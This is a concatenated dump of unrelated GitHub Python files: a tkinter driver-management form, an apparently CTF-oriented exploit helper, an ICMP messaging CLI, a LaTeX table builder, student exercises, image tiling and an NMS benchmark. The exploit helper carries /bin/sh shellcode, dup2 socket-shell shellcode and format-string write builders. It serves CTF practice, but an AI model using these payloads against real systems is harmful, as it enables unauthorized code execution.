veh_ownership_com = ttk.Combobox(vehicle_details, width=13, textvariable=veh_ownership_vr, font=(\"Arial\", 12))\r\n veh_ownership_com['values'] = (\"Personal\", \"Company\")\r\n veh_ownership_com.set(\"Personal\")\r\n veh_ownership_com.grid(row=2, column=3, pady=2, padx=5)\r\n\r\n # __________ Driver expiry details___________\r\n expiry_details = LabelFrame(add_new_driver_frame, text=\"Expiry Details\", bg=\"gray\")\r\n expiry_details.place(x=frame_width * 0.47, y=frame_height * 0.15, height=frame_height * 0.3,\r\n width=frame_width * 0.45)\r\n\r\n # _______label______________\r\n insurance_premium = Label(expiry_details, text=\"Insur. Premium\", font=(\"Arial\", 12))\r\n insurance_expiry = Label(expiry_details, text=\"Insur. 
Expiry\", font=(\"Arial\", 12))\r\n mot_expiry = Label(expiry_details, text=\"MOT Expiry\", font=(\"Arial\", 12))\r\n road_expiry = Label(expiry_details, text=\"Rd Tx Ex\", font=(\"Arial\", 12))\r\n pco_number = Label(expiry_details, text=\"PCO Num\", font=(\"Arial\", 12))\r\n pco_expiry = Label(expiry_details, text=\"PCO Exp Vehi\", font=(\"Arial\", 12))\r\n # _______________Actions_______________\r\n\r\n insurance_premium.grid(row=0, column=0, pady=2, padx=5)\r\n insurance_premium_entry = Entry(expiry_details, width=20)\r\n insurance_premium_entry.grid(row=0, column=1)\r\n # _____________________________________\r\n insurance_expiry.grid(row=0, column=2, pady=2, padx=5)\r\n insurance_ex_vr = StringVar()\r\n insurance_ex_picker = DateEntry(expiry_details, selectmode=\"day\", textvariable=insurance_ex_vr, font=(\"Arial\", 12),\r\n width=13)\r\n insurance_ex_picker.grid(row=0, column=3, pady=2, padx=5)\r\n # ______________________________________\r\n mot_expiry.grid(row=1, column=0, pady=2, padx=5)\r\n mot_expiry_vr = StringVar()\r\n mot_expiry_picker = DateEntry(expiry_details, selectmode=\"day\", textvariable=mot_expiry_vr, font=(\"Arial\", 12),\r\n width=13)\r\n mot_expiry_picker.grid(row=1, column=1, pady=2, padx=5)\r\n\r\n # _____________________________\r\n road_expiry.grid(row=1, column=2, pady=2, padx=5)\r\n road_expiry_vr = StringVar()\r\n road_expiry_picker = DateEntry(expiry_details, selectmode=\"day\", textvariable=road_expiry_vr, font=(\"Arial\", 12),\r\n width=13)\r\n road_expiry_picker.grid(row=1, column=3, pady=2, padx=5)\r\n # ______________________\r\n pco_number.grid(row=4, column=0, pady=2, padx=5)\r\n pco_number_entry = Entry(expiry_details, font=(\"Arial\", 12), width=15)\r\n pco_number_entry.grid(row=4, column=1, pady=2, padx=5)\r\n pco_expiry.grid(row=4, column=2, pady=2, padx=5)\r\n pco_expiry_vr = StringVar()\r\n pco_expiry_picker = DateEntry(expiry_details, selectmode=\"day\", textvariable=pco_expiry_vr, font=(\"Arial\", 12),\r\n width=13)\r\n pco_expiry_picker.grid(row=4, column=3, pady=2, padx=5)\r\n # __________ Payment mode___________\r\n payment_mode = LabelFrame(add_new_driver_frame, text=\"Payment Mode\", bg=\"orange\")\r\n payment_mode.place(x=frame_width * 0.47, y=frame_height * 0.32, height=frame_height * 0.22,\r\n width=frame_width * 0.45)\r\n # _________________Label_________________\r\n type_vehicle = Label(payment_mode, text=\" Pay Type\", font=(\"Arial\", 12), )\r\n deposit = Label(payment_mode, text=\"Deposit\", font=(\"Arial\", 12))\r\n base = Label(payment_mode, text=\"BaseRent\", font=(\"Arial\", 12))\r\n radio = Label(payment_mode, text=\"PDA Rent\", font=(\"Arial\", 12))\r\n outstanding_b = Label(payment_mode, text=\"Out Balance\", font=(\"Arial\", 12))\r\n commission_rate = Label(payment_mode, text=\"Comm Rate\", font=(\"Arial\", 12))\r\n commission_rate_acc = Label(payment_mode, text=\" Acc Comm Rate\", font=(\"Arial\", 12))\r\n rent = Label(payment_mode, text=\"Rent\", font=(\"Arial\", 12))\r\n salary = Label(payment_mode, text=\" Daily Salary\", font=(\"Arial\", 12))\r\n # _________________Action___________________\r\n global type_vehicle_vr, deposit_entry, base_vr, radio_vr, outstanding_b_entry, commission_rate_vr, commission_rate_acc_vr\r\n global rent_entry, salary_entry\r\n type_vehicle.grid(row=0, column=0, pady=2, padx=5)\r\n type_vehicle_vr = StringVar()\r\n type_vehicle_com = ttk.Combobox(payment_mode, textvariable=type_vehicle_vr, font=(\"Arial\", 12), width=13)\r\n type_vehicle_com[\"value\"] = (\"Rent\", \"Commission\")\r\n 
type_vehicle_com.set(\"Commission\")\r\n type_vehicle_com.grid(row=0, column=1, pady=2, padx=5)\r\n deposit.grid(row=0, column=2, pady=2, padx=5)\r\n deposit_entry = Entry(payment_mode, font=(\"Arial\", 12), width=15)\r\n deposit_entry.grid(row=0, column=3, pady=2, padx=5)\r\n base.grid(row=1, column=0, pady=2, padx=5)\r\n base_vr = IntVar()\r\n base_spin = ttk.Spinbox(payment_mode, from_=0, to=100, textvariable=base_vr, font=(\"Arial\", 12), width=13)\r\n base_spin.set(0)\r\n base_spin.grid(row=1, column=1, pady=2, padx=5)\r\n radio.grid(row=1, column=2, pady=2, padx=5)\r\n radio_vr = IntVar()\r\n radio_spin = ttk.Spinbox(payment_mode, from_=0, to=100, textvariable=radio_vr, font=(\"Arial\", 12), width=13)\r\n radio_spin.set(0)\r\n radio_spin.grid(row=1, column=3, pady=2, padx=5)\r\n outstanding_b.grid(row=2, column=0, pady=2, padx=5)\r\n outstanding_b_entry = Entry(payment_mode, font=(\"Arial\", 12), width=15)\r\n outstanding_b_entry.grid(row=2, column=1, pady=2, padx=5)\r\n commission_rate.grid(row=2, column=2, pady=2, padx=5)\r\n commission_rate_vr = IntVar()\r\n commission_rate_spin = ttk.Spinbox(payment_mode, from_=0, to=100, textvariable=commission_rate_vr,\r\n font=(\"Arial\", 12), width=13)\r\n commission_rate_spin.set(0)\r\n commission_rate_spin.grid(row=2, column=3, pady=2, padx=5)\r\n commission_rate_acc.grid(row=3, column=0, pady=2, padx=5)\r\n commission_rate_acc_vr = IntVar()\r\n commission_rate_acc_spin = ttk.Spinbox(payment_mode, from_=0, to=100, textvariable=commission_rate_acc_vr,\r\n font=(\"Arial\", 12), width=13)\r\n commission_rate_acc_spin.set(0)\r\n commission_rate_acc_spin.grid(row=3, column=1, pady=2, padx=5)\r\n rent.grid(row=3, column=2, pady=2, padx=5)\r\n rent_entry = Entry(payment_mode, font=(\"Arial\", 12), width=15)\r\n rent_entry.grid(row=3, column=3, pady=2, padx=5)\r\n salary.grid(row=4, column=0, pady=2, padx=5)\r\n salary_entry = Entry(payment_mode, font=(\"Arial\", 12), width=15)\r\n salary_entry.grid(row=4, column=1, pady=2, padx=5)\r\n # __________________ Button for drivers_____________\r\n add_driver_button = Frame(add_new_driver_frame, bg=\"purple\")\r\n add_driver_button.place(x=frame_width * 0.055, y=frame_height * 0.55, height=frame_height * 0.22,\r\n width=frame_width * 0.8)\r\n pda_settings = Button(add_driver_button, text=\"PDA settings\")\r\n manage_vehicle = Button(add_driver_button, text=\"Manage Vehicle\")\r\n manage_leave = Button(add_driver_button, text=\"Manage Leave\")\r\n add_edit_vehicle = Button(add_driver_button, text=\"Add/Edit Vehicle\")\r\n note_by_me = Label(add_driver_button, text=\"Note: Do not Put any Symbols in any field above\",\r\n font=(\"Comic Sans MS\", 12, \"bold\"))\r\n pda_settings.place(x=20, y=15, width=100, height=30)\r\n manage_vehicle.place(x=140, y=15, width=100, height=30)\r\n manage_leave.place(x=260, y=15, width=100, height=30)\r\n add_edit_vehicle.place(x=380, y=15, width=100, height=30)\r\n note_by_me.place(x=500, y=15)\r\n # ______________________\r\n save_driver_btn = Button(add_driver_button, text=\"Save\", command=saver)\r\n search_driver_btn = Button(add_driver_button, text=\"Search\")\r\n clear_driver_btn = Button(add_driver_button, text=\"Clear\")\r\n driver_list_btn = Button(add_driver_button, text=\"Driver List\")\r\n vehicle_history_btn = Button(add_driver_button, text=\"Vehicl History\")\r\n print_driver_btn = Button(add_driver_button, text=\"Print\")\r\n delete_driver_btn = Button(add_driver_button, text=\"Delete Driver\")\r\n close_driver_btn = Button(add_driver_button, 
text=\"Close\")\r\n save_driver_btn.place(x=20, y=60, width=100)\r\n search_driver_btn.place(x=140, y=60, width=100)\r\n clear_driver_btn.place(x=260, y=60, width=100)\r\n driver_list_btn.place(x=380, y=60, width=100)\r\n vehicle_history_btn.place(x=500, y=60, width=100)\r\n print_driver_btn.place(x=620, y=60, width=100)\r\n delete_driver_btn.place(x=740, y=60, width=100)\r\n close_driver_btn.place(x=860, y=60, width=100)\r\n # _____________________Driver_________________\r\n # driver_image_frame = Frame(add_new_driver_frame, bg=\"white\")\r\n # driver_image_frame.place(x=650, y=5, height=350, width=400)\r\n # add_image_driver = Button(driver_image_frame, text=\"Add Image of driver\", width=10, height=5)\r\n # add_image_driver.pack(pady=100)\r\n\r\n # ___________________________Vehicle Image --------------------------------\r\n vehicle_image_frame = Frame(add_new_driver_frame, bg=\"white\")\r\n # vehicle_image_frame.place(x=650, y=370, height=280, width=400)\r\n add_vehicle_image_driver = Button(vehicle_image_frame, text=\"Add Image of driver\", width=10, height=5)\r\n# add_vehicle_image_driver.pack(pady=100)\r\n","repo_name":"Junaid5814/cabhook","sub_path":"Driver/add_new_driver.py","file_name":"add_new_driver.py","file_ext":"py","file_size_in_byte":22619,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"11381399615","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\nimport __main__, os, sys, struct, socket, telnetlib, subprocess, time\nfrom libformatstr import FormatStr\nimport sys, re, binascii\n\nhome = os.environ['HOME']\nmgtoolslib = home + \"/mgtools/lib/python\"\npedalib = home + \"/peda/lib\"\nif not(os.path.exists(pedalib)):\n print(\"[+]Error\\nTry: mpinstall\")\nsys.path.append(mgtoolslib)\nsys.path.append(pedalib)\n\nimport shlex\nimport string\nimport signal\nimport traceback\nimport codecs\nimport six\nfrom six.moves import range\nfrom six.moves import input\nimport six.moves.cPickle as pickle\nimport pickle\nfrom skeleton import *\nfrom shellcode import *\nfrom utils import *\nimport config\nfrom nasm import *\n\nproc = ''\ns = ''\n \ndef local(cmd):\n __main__.proc = subprocess.Popen(cmd.strip().split(' '))\n proc.wait()\n\ndef pipelocal(cmd):\n __main__.proc = subprocess.Popen(cmd.strip().split(' '), stdin=subprocess.PIPE, stdout=subprocess.PIPE)\n\n# socat tcp-listen:4444,reuseaddr,fork exec:./a.out\ndef sock(remoteip=\"127.0.0.1\", remoteport=4444):\n __main__.s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n s.connect((remoteip, remoteport))\n time.sleep(0.5)\n\ndef splitn(data, n):\n length = len(data)\n return [data[i:i+n] for i in range(0, length, n)]\n\ndef writefile(buf_arg,file_name):\n with open(file_name, 'wb') as f:\n f.write(buf_arg)\n\ndef recv(delim='\\n', out=1):\n data = ''\n while not data.endswith(delim):\n data += s.recv(1)\n if(out == 1):\n print('\\nrecv: \\n' + data + '\\n')\n return data\n\ndef recvn(x=1024, out=1):\n data = ''\n data += s.recv(x)\n if(out == 1):\n print('\\nrecv: \\n' + data + '\\n')\n return data\n\ndef send(x, sleep=0.3, out=1):\n s.sendall(x + '\\n')\n if(out == 1):\n print('\\nsend: \\n' + x + '\\n')\n time.sleep(sleep)\n\ndef u(x):\n return struct.unpack(\"0):\n data += proc.stdout.read(1)\n num = num-1\n if(out == 1):\n print('\\nread: \\n' + data + '\\n')\n return data\n \ndef fsa1(recent_len, index_start, after_data):\n data = '%' + \\\n str( ((after_data-int(hex(recent_len)[:4],16)-1)%0x100)+1 ) + \\\n 'c%' + str(index_start) + '$hhn'\n return 
data\n\ndef fsa4(recent_len, index_start, after_addr):\n a = map(ord,p(after_addr))\n b = map(ord,p(after_addr))\n a[3] = ((a[3]-a[2]-1) % 0x100) + 1\n a[2] = ((a[2]-a[1]-1) % 0x100) + 1\n a[1] = ((a[1]-a[0]-1) % 0x100) + 1\n a[0] = ((a[0]-int(hex(recent_len)[:4],16)-1) % 0x100) + 1\n data = ''\n data += '%{0}c'.format(str(a[0])) + \\\n '%' + str(index_start+0) + '$hhn'\n data += '%{0}c'.format(str(a[1])) + \\\n '%' + str(index_start+1) + '$hhn'\n data += '%{0}c'.format(str(a[2])) + \\\n '%' + str(index_start+2) + '$hhn'\n data += '%{0}c'.format(str(a[3])) + \\\n '%' + str(index_start+3) + '$hhn'\n return data\n\ndef writefile(buf_arg,file_name):\n with open(file_name, 'wb') as f:\n f.write(buf_arg)\n\ndef addr2index(x):\n return x*2\n\ndef index2addr(x):\n return x/2\n\ndef ascii2addr(x):\n addr1 = str(x)[0:2]\n addr2 = str(x)[2:4]\n addr3 = str(x)[4:6]\n addr4 = str(x)[6:8]\n return int(addr4 + addr3 + addr2 + addr1, 16)\n\ndef splitn(data, n):\n length = len(data)\n return [data[i:i+n] for i in range(0, length, n)]\n\ndef xxd(a):\n a = str(a)\n hexdump.hexdump(a)\n\ndef dmp(binary, fmt=\"def\"):\n res = binascii.hexlify(binary)\n if(fmt == \"x\"):\n arr = splitn(res, 8)\n res = []\n for var in arr:\n res.append(hex(ascii2addr(var)))\n if(fmt == \"d\"):\n arr = splitn(res, 8)\n res = []\n for var in arr:\n res.append(ascii2addr(var))\n return res\n\ndef s12(value):\n res = []\n for item in value.split(\" \"):\n res.append(bin(int(item,16))[2:])\n return -(int(res[0].zfill(4)+res[1].zfill(8),2) & 0b100000000000) | (int(res[0].zfill(4)+res[1].zfill(8),2)& 0b011111111111)\n\nsc_execve32 = \"\\x31\\xd2\\x52\\x68\\x2f\\x2f\\x73\\x68\\x68\\x2f\\x62\\x69\\x6e\\x89\\xe3\\x52\\x53\\x89\\xe1\\x8d\\x42\\x0b\\xcd\\x80\"\nsc_execve64 = \"\\x48\\x31\\xd2\\x48\\xbb\\x2f\\x2f\\x62\\x69\\x6e\\x2f\\x73\\x68\\x48\\xc1\\xeb\\x08\\x53\\x48\\x89\\xe7\\x50\\x57\\x48\\x89\\xe6\\xb0\\x3b\\x0f\\x05\"\nsc_dup2execve32 = \"\\x31\\xd2\\x31\\xc9\\x8d\\x5a\\x04\\x8d\\x42\\x3f\\xcd\\x80\\x41\\x8d\\x42\\x3f\\xcd\\x80\\x31\\xd2\\x52\\x68\\x2f\\x2f\\x73\\x68\\x68\\x2f\\x62\\x69\\x6e\\x89\\xe3\\x52\\x53\\x89\\xe1\\x8d\\x42\\x0b\\xcd\\x80\"\n\"\"\"\n /* sc_dup2execve32 */\n .intel_syntax noprefix\n .globl _start\n_start:\n /* dup2(2, 0) */\n xor edx, edx\n xor ecx, ecx\n lea ebx, [edx+4] //fd 4\n lea eax, [edx+63]\n int 0x80\n /* dup2(2, 1) */\n inc ecx\n lea eax, [edx+63]\n int 0x80\n /* execve(\"/bin//sh\", {\"/bin//sh\", NULL}, NULL) */\n xor edx, edx\n push edx\n push 0x68732f2f\n push 0x6e69622f\n mov ebx, esp\n push edx\n push ebx\n mov ecx, esp\n lea eax, [edx+11]\n int 0x80\n\"\"\"\n#-----------START EXPLOIT CODE-----------#\n\n","repo_name":"miyagaw61/mgtools","sub_path":"ctf/x.py","file_name":"x.py","file_ext":"py","file_size_in_byte":5910,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"60"} +{"seq_id":"43326836179","text":"from queue import PriorityQueue\n\n\nclass Graph:\n\n def __init__(self, vertices, source):\n self.V = vertices\n self.graph = []\n self.distance = [float(\"Inf\")] * self.V\n self.distance[source] = 0\n self.visited = []\n self.q = PriorityQueue()\n self.q.put((0, source))\n\n def add_edge(self, u, v, w):\n self.graph.append([u, v, w])\n\n def relax(self):\n for i in range(self.V):\n for u, v, w in self.graph:\n if self.distance[u] != float(\"Inf\") and self.distance[u] + w < self.distance[v]:\n self.distance[v] = self.distance[u] + w\n self.q.put(self.distance[u] + w, i)\n\n def dijkstra(self):\n while not self.q.empty():\n current = 
self.q.get()\n self.visited.append(current)\n for i in range(self.V):\n if i not in self.visited:\n self.relax()\n for k in range(self.V):\n print(\"{0} ----> {1}\".format(k, self.distance[k]))\n\n\n# clrs example\n# s=0 , t=1 ,y=2 , x=3, z=4\ng = Graph(5, 0)\ng.add_edge(0, 1, 10)\ng.add_edge(0, 2, 5)\ng.add_edge(1, 2, 2)\ng.add_edge(1, 3, 1)\ng.add_edge(2, 1, 3)\ng.add_edge(2, 3, 9)\ng.add_edge(2, 4, 2)\ng.add_edge(3, 4, 4)\ng.add_edge(4, 3, 6)\ng.add_edge(4, 0, 7)\ng.dijkstra()\n","repo_name":"MahyarFardin/CLRS-Algoriothms","sub_path":"36- Single-Source Shortest Paths/Dijkstra’s algorithm/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1308,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"60"} +{"seq_id":"7812789125","text":"#!/usr/bin/sudo python3\nimport argparse\nimport logging\nimport os\nimport pathlib\nimport sys\nfrom enum import Enum\n\nfrom magicPing import client\nfrom magicPing import server\nfrom magicPing import icmp\n\n\nclass TypeOfApp(Enum):\n \"\"\"\n Application run modes\n \"\"\"\n MONITOR = 0\n SERVER = 1\n CLIENT = 2\n\n\ndef get_parser() -> argparse.ArgumentParser:\n \"\"\"\n builds the command-line argument parser\n :return: the configured parser\n \"\"\"\n parser = argparse.ArgumentParser(\n description=\"Application for sending/receiving messages via ECHO REQUEST\")\n parser.set_defaults(type=None)\n parser.add_argument(\"--log_file\", \"-l\", dest=\"log_file\", type=open,\n default=sys.stderr, help=\"Path to the log file\")\n\n log_level = parser.add_mutually_exclusive_group()\n log_level.set_defaults(log_level=logging.INFO)\n log_level.add_argument(\"--error\", \"-e\", dest=\"log_level\",\n action=\"store_const\", const=logging.ERROR,\n help=\"Limit logging to errors\")\n log_level.add_argument(\"--info\", \"-i\", dest=\"log_level\",\n action=\"store_const\", const=logging.INFO,\n help=\"Limit logging to info messages\")\n log_level.add_argument(\"--debug\", \"-d\", dest=\"log_level\",\n action=\"store_const\", const=logging.DEBUG,\n help=\"Limit logging to debug messages\")\n subparsers = parser.add_subparsers()\n\n server_parser = subparsers.add_parser(\"server\", aliases=[\"s\"], help=\"start the server\")\n server_parser.set_defaults(type=TypeOfApp.SERVER)\n server_parser.add_argument(\"--max_size\", \"-m\", type=int, default=1024 ** 3 * 15,\n help=\"Maximum file size in bytes\", )\n server_parser.add_argument(\"--thread_number\", \"-t\", type=int, default=1,\n help=\"Number of threads processing packets\")\n daemon_group = server_parser.add_mutually_exclusive_group()\n daemon_group.add_argument(\"--start_daemon\", \"-d\", action=\"store_const\",\n const=True, default=False, help=\"Run as a daemon\")\n daemon_group.add_argument(\"--stop_daemon\", \"-s\", action=\"store_const\",\n const=True, default=False, help=\"Stop the daemon\")\n daemon_group.add_argument(\"--restart_daemon\", \"-r\", action=\"store_const\",\n const=True, default=False, help=\"Restart the daemon\")\n server_parser.add_argument(\"--target_path\", \"-p\",\n type=lambda x: pathlib.Path(os.path.realpath(x)),\n default=pathlib.Path(os.getcwd()),\n help=\"Directory for incoming files\")\n\n client_parser = subparsers.add_parser(\"client\", aliases=[\"c\"], help=\"start the client\")\n client_parser.set_defaults(type=TypeOfApp.CLIENT)\n client_parser.add_argument(\"--max_size\", \"-m\", type=int, default=1024 ** 3 * 15,\n help=\"Maximum file size in bytes\")\n 
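The dijkstra() above never actually uses the priority queue's ordering: relax() pushes bare distances (and `q.put(dist, i)` even passes the node index as the queue's `block` argument), so the outer loop simply re-runs relax(), which is a full Bellman-Ford pass, once per node. That still converges to correct distances, but it is not Dijkstra. For comparison, a minimal self-contained sketch of the textbook heap-based version (adjacency list, non-negative weights assumed):

```python
import heapq

def dijkstra(adj, source):
    # adj: {u: [(v, w), ...]} with non-negative edge weights
    dist = {u: float("inf") for u in adj}
    dist[source] = 0
    heap = [(0, source)]
    while heap:
        d, u = heapq.heappop(heap)
        if d > dist[u]:          # stale heap entry; u was already settled
            continue
        for v, w in adj[u]:
            if d + w < dist[v]:  # relax edge (u, v)
                dist[v] = d + w
                heapq.heappush(heap, (dist[v], v))
    return dist

# Same CLRS example as above: s=0, t=1, y=2, x=3, z=4
adj = {0: [(1, 10), (2, 5)], 1: [(2, 2), (3, 1)], 2: [(1, 3), (3, 9), (4, 2)],
       3: [(4, 4)], 4: [(3, 6), (0, 7)]}
print(dijkstra(adj, 0))  # {0: 0, 1: 8, 2: 5, 3: 9, 4: 7}
```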
timeout_group = client_parser.add_mutually_exclusive_group()\n timeout_group.add_argument(\"--timeout\", \"-t\", type=float, default=10.,\n help=\"Maximum wait time in seconds\")\n timeout_group.add_argument(\"--unlimited\", \"-u\", action=\"store_const\",\n const=None, dest=\"timeout\", help=\"Do not limit the wait time\")\n client_parser.add_argument(\"--filename\", \"-f\", default=None, help=\"Path to the file to send\")\n client_parser.add_argument(\"--destination\", \"-d\", default=None, help=\"recipient address\")\n client_parser.add_argument(\"--cypher\", \"-c\", action=\"store_const\",\n const=True, default=False, help=\"Use encryption\")\n\n monitor_parser = subparsers.add_parser(\"monitor\", aliases=[\"m\"],\n help=\"start monitoring of \" +\n \"ping echo request/reply\")\n monitor_parser.set_defaults(type=TypeOfApp.MONITOR)\n\n return parser\n\n\nif __name__ == \"__main__\":\n parser = get_parser()\n args = parser.parse_args()\n logging.basicConfig(format=\"%(levelname)-8s [%(asctime)-15s; %(name)s]: %(message)s\",\n level=args.log_level, stream=args.log_file)\n\n if args.type == TypeOfApp.SERVER:\n if args.start_daemon:\n server.DaemonServer(args.max_size, args.thread_number, args.target_path).start()\n elif args.stop_daemon:\n server.DaemonServer(None, None, None).stop()\n elif args.restart_daemon:\n server.DaemonServer(None, None, None).restart()\n else:\n daemon_server = server.DaemonServer(args.max_size, args.thread_number, args.target_path,\n stdin=sys.stdin, stdout=sys.stdout, stderr=sys.stderr)\n daemon_server.start()\n while input(\"enter \\\"q\\\" to shut down the server\\n\") != \"q\":\n pass\n else:\n daemon_server.stop()\n sys.exit(0)\n\n elif args.type == TypeOfApp.CLIENT:\n client = client.Client(max_size=args.max_size, timeout=args.timeout, enable_cypher=args.cypher)\n client.send(args.filename if args.filename is not None else input(\"File name to send: \"),\n args.destination if args.destination is not None else input(\"Recipient: \"))\n\n elif args.type == TypeOfApp.MONITOR:\n icmp.monitor()\n\n else:\n parser.print_help()\n","repo_name":"2ZeroSix/magic-ping","sub_path":"magicPing/__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":6272,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"15618165682","text":"import pandas as pd\n\nfrom latex import utils as latex_utils\nfrom latex.table_creator import table_creator\nfrom validator_tests.utils.constants import TARGET_ACCURACY\n\n\ndef preprocess_df(df):\n latex_utils.convert_adapter_name(df)\n return df\n\n\ndef reshape_into_best_accuracy_table(df):\n df = df.pivot(index=\"adapter\", columns=\"task\").droplevel(level=0, axis=1)\n df = latex_utils.add_source_only(df, TARGET_ACCURACY)\n df = latex_utils.shortened_task_names(df)\n df = (df * 100).round(1)\n return df\n\n\ndef postprocess_df(df):\n df = pd.concat(df, axis=0)\n df = df.drop(columns=[f\"{TARGET_ACCURACY}_std\"])\n return reshape_into_best_accuracy_table(df)\n\n\ndef min_value_fn(x, *_):\n return x.loc[\"Source only\"]\n\n\ndef best_accuracy_per_adapter(args, do_save_to_latex=True):\n nlargest = args.nlargest\n basename = f\"best_accuracy_per_adapter_{nlargest}\"\n color_map_tag_kwargs = {\n \"tag_prefix\": latex_utils.get_tag_prefix(basename),\n \"min_value_fn\": min_value_fn,\n }\n caption = (\n f\"The average of the top {nlargest} target domain accuracies per adapter/task pair. 
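The magicPing entry point above layers subparsers (server/client/monitor) on top of mutually exclusive option groups. A tiny self-contained demo of that argparse pattern (flag names here are illustrative, not the original ones):

```python
import argparse

parser = argparse.ArgumentParser()
sub = parser.add_subparsers()

server = sub.add_parser("server")
server.set_defaults(mode="server")
daemon = server.add_mutually_exclusive_group()  # at most one of these flags
daemon.add_argument("--start_daemon", action="store_const", const=True, default=False)
daemon.add_argument("--stop_daemon", action="store_const", const=True, default=False)

args = parser.parse_args(["server", "--start_daemon"])
print(args.mode, args.start_daemon)  # server True
# parse_args(["server", "--start_daemon", "--stop_daemon"]) would exit with an
# error, because the group permits only one flag at a time.
```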
\"\n \"Green cells have an average accuracy greater than than the source-only model. \"\n \"A stronger green color indicates higher accuracy. The highest value per column is bolded.\"\n )\n return table_creator(\n args,\n args.input_folder,\n args.output_folder,\n basename,\n preprocess_df,\n postprocess_df,\n color_map_tag_kwargs,\n add_resizebox=True,\n caption=caption,\n final_str_hook=latex_utils.adapter_final_str_hook,\n do_save_to_latex=do_save_to_latex,\n )\n","repo_name":"KevinMusgrave/powerful-benchmarker","sub_path":"latex/best_accuracy_per_adapter.py","file_name":"best_accuracy_per_adapter.py","file_ext":"py","file_size_in_byte":1667,"program_lang":"python","lang":"en","doc_type":"code","stars":423,"dataset":"github-code","pt":"60"} +{"seq_id":"9373174825","text":"from unittest import result\nfrom data import *\nfrom data import GreatesHits80s\nfrom functions import *\n'''\nhány szám található a listában?\nlegrégebbi szám címe és előadója\nleghosszabb szám hossza, megjelenés éve és kategóriája\nKérjünk egy kategóriát, hány szám van a listában ebből a kategóriából?\n ha nincs, akkor írjuk ki, hogy nincs\nKérjünk be egy előadó nevet, szerepel-e a listában a dala \n ne folytassa a keresést talált előadót\n'''\nprint('1 feladat')\nprint(f'\\t A listában {len(GreatesHits80s)} dal szerepel')\n\n \nmaxIndex = 0\nmaxValue = idotartam(GreatesHits80s[0])\n\nfor i in range(1,len(GreatesHits80s)):\n if maxValue < idotartam(GreatesHits80s[i]):\n maxValue = idotartam(GreatesHits80s[i])\n maxIndex = i\n\n\n\nprint(f'2. feladat: A leghosszabb szám: {maxValue} másodperc')\nprint(f'Megjelenés éve: {(GreatesHits80s[maxIndex])}')\nprint(f'Kategóriája: {categorie(GreatesHits80s[maxIndex])}')\nprint('3. feladat')\nkategoria = input('\\t kérek a kategória nevét: ')\n\ncount = 0\n\nfor h in GreatesHits80s:\n if categorie(h).upper() == kategoria.upper():\n count != 1\nif count == 0:\n print('\\t Ebben a kategóriában nincs dal a listában.')\nelse:\n print(f'\\t {count} dal szerepel a listában ebből a kategóriából.')\n\n\nprint('4. faldat')\n\n\nname = input('\\t Előadó neve: ')\n\nfor i in GreatesHits80s:\n for szam in GreatesHits80s:\n szamok = szam.split(';')\n if szamok[1] == name:\n print('\\tEladőadó szerepel a listában')\n break\n else: \n print('\\tEladőadó nem szerepel a listában')\n \n ","repo_name":"kevin16740/vizsgasegedletek","sub_path":"Gyak/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1676,"program_lang":"python","lang":"hu","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"10988538567","text":"def inputData(lst35):\n for i in range(3):\n print('#%d student' % (i + 1))\n lst35.append([])\n for j in range(5):\n lst35[i].insert(j, eval(input()))\n return lst35\n\n\ndef totAver(lst35):\n for i in range(len(lst35)):\n print('#%d student:' % (i + 1))\n print('sum = %d, average = %.2f' % (sum(lst35[i]), sum(lst35[i]) / len(lst35[i])))\n print()\n\n\ndef main():\n lst35 = []\n lst35 = inputData(lst35)\n totAver(lst35)\n\n\nmain()\n","repo_name":"tueswking511/TQC_Python","sub_path":"Ch06/5.py","file_name":"5.py","file_ext":"py","file_size_in_byte":486,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"74762781632","text":"import numpy as np\n\n\ndef image2tile(im, size: int) -> list:\n w = h = size\n tiles = [im[i:(i + h), j:(j + w), ...] 
for i in range(0, im.shape[0], h) for j in range(0, im.shape[1], w)]\n idxs = [(i, (i + h), j, (j + w)) for i in range(0, im.shape[0], h) for j in range(0, im.shape[1], w)]\n for idx, tile in enumerate(tiles):\n if tile.shape[:2] != (h, w):\n tile_ = tile\n tile = np.zeros_like(tiles[0])\n tile[:tile_.shape[0], :tile_.shape[1], ...] = tile_\n tiles[idx] = tile\n return tiles, idxs\n\n\ndef tile2image(tiles, idxs, size: list):\n seg = np.zeros([*size, tiles[0].shape[2]], dtype=tiles[0].dtype)\n for tile, (i1, i2, j1, j2) in zip(tiles, idxs):\n i2 = min(i2, size[0])\n j2 = min(j2, size[1])\n seg[i1:i2, j1:j2, :] = tile[:(i2 - i1), :(j2 - j1), :]\n return seg","repo_name":"DanilKim/hbmap","sub_path":"utils/tile_utils.py","file_name":"tile_utils.py","file_ext":"py","file_size_in_byte":857,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"60"} +{"seq_id":"74471048832","text":"import numpy as np\nimport time\n#from nms.nums_py2 import py_cpu_nms # for cpu\nfrom nms.gpu_nms import gpu_nms # for gpu \n\n\nnp.random.seed( 1 ) # keep fixed\nnum_rois = 6000\nminxy = np.random.randint(50,145,size=(num_rois ,2))\nmaxxy = np.random.randint(150,200,size=(num_rois ,2))\nscore = 0.8*np.random.random_sample((num_rois ,1))+0.2\n\nboxes_new = np.concatenate((minxy,maxxy,score), axis=1).astype(np.float32)\n\ndef nms_test_time(boxes_new):\n\n thresh = [0.7,0.8,0.9]\n T = 50\n for i in range(len(thresh)):\n since = time.time()\n for t in range(T):\n\n# keep = py_cpu_nms(boxes_new, thresh=thresh[i]) # for cpu\n keep = gpu_nms(boxes_new, thresh=thresh[i]) # for gpu\n print(\"thresh={:.1f}, time wastes:{:.4f}\".format(thresh[i], (time.time()-since)/T))\n \n return keep\n\n\nif __name__ ==\"__main__\":\n nms_test_time(boxes_new)\n 